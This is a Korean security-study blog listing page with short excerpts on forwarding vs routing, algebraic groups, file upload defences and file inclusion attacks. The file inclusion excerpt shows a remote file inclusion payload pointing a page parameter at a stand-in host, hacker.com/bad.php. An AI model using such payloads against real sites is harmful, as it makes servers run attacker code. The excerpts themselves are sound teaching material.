본문 바로가기
728x90

보안23

Forwarding vs Routing 유튜브를 시작했습니다! 굉장히 허접하지만 봐주시면 너무 감사할 거 같습니다ㅠㅠ감사합니다. https://www.youtube.com/watch?v=gcyV95u2814&t=7s 오늘 데이터통신 시간에는 Forwarding 과 Routing 에 대해 배워서 정리해보겠습니다. 일단은 Router Architecture Overview 를 보면 좀 더 자세히 봐 볼까요? 위 아래로 층이 나뉘어져 있습니다. 위는 routing, management control plane 이고 아래는 forwarding data plane 입니다. 쉽게 말해 위는 제어를 담당하는 부분이고 밑은 데이터가 이동하는 부분이라고 보면 됩니다. 좀 더 보기 쉽게 표로 정리했습니다. Forwarding Routing 역할 Router i.. 2020. 5. 21.
Group,Rings, and Fields https://www.youtube.com/watch?v=Lq8b9yw8uPk 유튜브 설명영상을 찍었습니다! 굉장히 허접한데 발전해 가는 모습 모여드리겠습니다ㅠㅠ Number Theory 중에서도 보안에서 꼭 알아야하는 'Group'에 대해 알아보겠습니다. 전체적인 집합의 그림은 아래와 같습니다. 저희는 오늘 Group,Field,Ring에 대해 집중적으로 공부해보도록 하겠습니다. 이러한 집합들은 '어떠한 연산을 만족시키는' 기준으로 집합이 형성됩니다. 여기서 '어떠한 연산'이 존재하는지 알아보겠습니다. Properties of Operator ⊕ : k X k -> k (하나의 연산자라고 생각을 해주시면 됩니다.) (1) Closure : 닫혀있다 라는 의미. 집합 {1,2,3} 있을때 연산을 아무리 .. 2020. 5. 21.
파일 업로드 대응 방법 파일 업로드에 대해 모르신다면 아래 포스팅으로 보고 와주세요ㅎㅎ https://com24everyday.tistory.com/39 파일 업로드 공격 오늘은 파일 업로드 공격을 배워보겠습니다. 파일 업로드 공격이란 파일이 업로드 될 수 있는 페이지에 악성 파일(웹쉘)을 업로드하는 것 입니다. 웹쉘이란 커맨드 인젝션에서 본 것과 비슷하게 웹을 통해 시스템.. com24everyday.tistory.com 보면 이미지 파일의 내용을 확인하여 겉모습만 이미지 파일인 것들을 걸러주고 있습니다. 또 다른 방법으로는 업로드 되는 파일을 랜덤하게 생성시켜서 해커가 자기가 업로드한 파일에 접근하지 못하게 하는 방법입니다. 또 업로드 서버와 웹애플리케이션 서버와 분리하는 방법이 있습니다. 이 방법들이 다 안되면 업로드 폴.. 2020. 5. 6.
파일 인클루젼 공격 안녕하세요. 오늘은 파일 인클루젼 공격에 대해 알아보겠습니다. 파일 인클루젼 공격은 주로 PHP Application 에서 발생합니다. 그 이유는 PHP include() 로 앱 요청을 지정할 수 있다면 파일을 직접 소스코드에 삽입할 수 있기 때문입니다. -로컬파일인클루젼(LFI) : 웹 서버에 이미 존재하고 있는 파일을 인클루드 -리모트파일인클루젼(RFI) : LFI 보다 더 강력한 공격으로 원격으로 외부에 있는 파일을 인클루드 정상적 웹 사이트 page=file.php 이렇게 파일을 인클루드 하는데 해커는 자신의 사이트를 통해 page = htpp://hacker.com/bad.php 인클루드 시켜버립니다. 만약 검사를 따로 하지 않는다면 웹 사이트는 그대로 악성코드를 실행시키게 되는 겁니다. 이제 .. 2020. 5. 4.
728x90